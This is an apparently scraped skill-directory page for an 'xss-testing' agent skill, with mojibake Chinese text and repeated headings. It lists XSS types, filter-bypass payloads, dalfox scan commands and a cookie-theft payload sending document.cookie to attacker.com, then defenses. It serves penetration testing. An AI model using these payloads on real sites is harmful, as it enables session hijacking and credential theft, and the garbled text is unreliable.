xss-testing

📁 ed1s0nz/cyberstrikeai 📅 9 days ago

总安装量

周安装量

#28119

全站排名

安装命令

npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill xss-testing

Agent 安装分布

codex 4

opencode 3

amp 2

kimi-cli 2

gemini-cli 2

Skill 文档

XSSæµè¯æè½

æ¦è¿°

XSSç±»å

1. åå°åXSS (Reflected XSS)

æ¶æèæ¬éè¿URLåæ°ä¼ é
æå¡å¨ç´æ¥è¿ååå«èæ¬çååº
éè¦ç¨æ·ç¹å»æ¶æé¾æ¥

2. åå¨åXSS (Stored XSS)

æ¶æèæ¬åå¨å¨æå¡å¨ï¼æ°æ®åºãæä»¶çï¼
ææè®¿é®åå½±åé¡µé¢çç¨æ·é½ä¼æ§è¡èæ¬
å½±åèå´æ´å¤§

3. DOMåXSS (DOM-based XSS)

å®¢æ·ç«¯JavaScriptå¤çç¨æ·è¾å¥ä¸å½
ä¸æ¶åæå¡å¨ç«¯å¤ç
éè¿ä¿®æ¹DOMç»æè§¦å

æµè¯æ¹æ³

åºç¡Payload

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>

ç»è¿è¿æ»¤

å¤§å°åç»è¿

<ScRiPt>alert('XSS')</ScRiPt>

ç¼ç ç»è¿

%3Cscript%3Ealert('XSS')%3C/script%3E
&#60;script&#62;alert('XSS')&#60;/script&#62;

äºä»¶å¤çå¨

<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>

ä¼ªåè®®

<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">

é«çº§ç»è¿ææ¯

ä½¿ç¨String.fromCharCode

<script>alert(String.fromCharCode(88,83,83))</script>

ä½¿ç¨evalåatob

<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>

ä½¿ç¨HTMLå®ä½

&#60;script&#62;alert('XSS')&#60;/script&#62;

å·¥å·ä½¿ç¨

dalfox

# åºç¡æ«æ
dalfox url "http://target.com/page?q=test"

# æå®åæ°
dalfox url "http://target.com/page" -d "q=test" -X POST

# ä½¿ç¨èªå®ä¹payload
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt

Burp Suite

ä½¿ç¨Intruderæ¨¡åè¿è¡æ¹éæµè¯
ä½¿ç¨Repeateræå¨æµè¯
ä½¿ç¨Scannerèªå¨æ£æµ

æµè§å¨æ§å¶å°

æµè¯DOMåXSS
æ£æ¥JavaScriptæ§è¡ç¯å¢
è°è¯payload

éªè¯åå©ç¨

éªè¯æ¥éª¤

ç¡®è®¤payloadè¢«æ§è¡
æ£æ¥æ¯å¦è¢«è¿æ»¤æç¼ç
æµè¯ä¸åä¸ä¸æï¼HTMLãJavaScriptãå±æ§çï¼
è¯ä¼°å½±åï¼Cookieçªåãä¼è¯å«æçï¼

å©ç¨åºæ¯

Cookieçªåï¼<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
é®çè®°å½ï¼æ³¨å¥é®çäºä»¶çå¬å¨
éé±¼æ»å»ï¼ä¼ªé ç»å½è¡¨å
ä¼è¯å«æï¼è·åç¨æ·ä¼è¯token

æ¥åè¦ç¹

XSSç±»åï¼åå°/åå¨/DOMï¼
è§¦åä½ç½®ååæ°
å®æ´çPOC
å½±åè¯ä¼°
ä¿®å¤å»ºè®®ï¼è¾åºç¼ç ãCSPçç¥çï¼

é²æ¤æªæ½

è¾å¥éªè¯åè¿æ»¤
è¾åºç¼ç ï¼HTMLãJavaScriptãURLï¼
Content Security Policy (CSP)
HttpOnly Cookieæ å¿
ä½¿ç¨å®å¨çæ¡æ¶ååº

GitHub 仓库 ↗ ← 返回陌讯 Skills 聚合平台

xss-testing

Agent 安装分布

Skill 文档

XSSæµè¯æè½

æ¦è¿°

XSSç±»å

1. åå°åXSS (Reflected XSS)

2. å­å¨åXSS (Stored XSS)

3. DOMåXSS (DOM-based XSS)

æµè¯æ¹æ³

åºç¡Payload

ç»è¿è¿æ»¤

å¤§å°åç»è¿

ç¼ç ç»è¿

äºä»¶å¤çå¨

ä¼ªåè®®

é«çº§ç»è¿ææ¯

ä½¿ç¨String.fromCharCode

ä½¿ç¨evalåatob

ä½¿ç¨HTMLå®ä½

å·¥å ·ä½¿ç¨

dalfox

Burp Suite

æµè§å¨æ§å¶å°

éªè¯åå©ç¨

éªè¯æ­¥éª¤

å©ç¨åºæ¯

æ¥åè¦ç¹

é²æ¤æªæ½

XSSæµè¯æè½

æ¦è¿°

XSSç±»å

1. åå°åXSS (Reflected XSS)

2. åå¨åXSS (Stored XSS)

3. DOMåXSS (DOM-based XSS)

æµè¯æ¹æ³

åºç¡Payload

ç»è¿è¿æ»¤

å¤§å°åç»è¿

ç¼ç ç»è¿

äºä»¶å¤çå¨

ä¼ªåè®®

é«çº§ç»è¿ææ¯

ä½¿ç¨String.fromCharCode

ä½¿ç¨evalåatob

ä½¿ç¨HTMLå®ä½

å·¥å·ä½¿ç¨

æµè§å¨æ§å¶å°

éªè¯åå©ç¨

éªè¯æ¥éª¤

å©ç¨åºæ¯

æ¥åè¦ç¹

é²æ¤æªæ½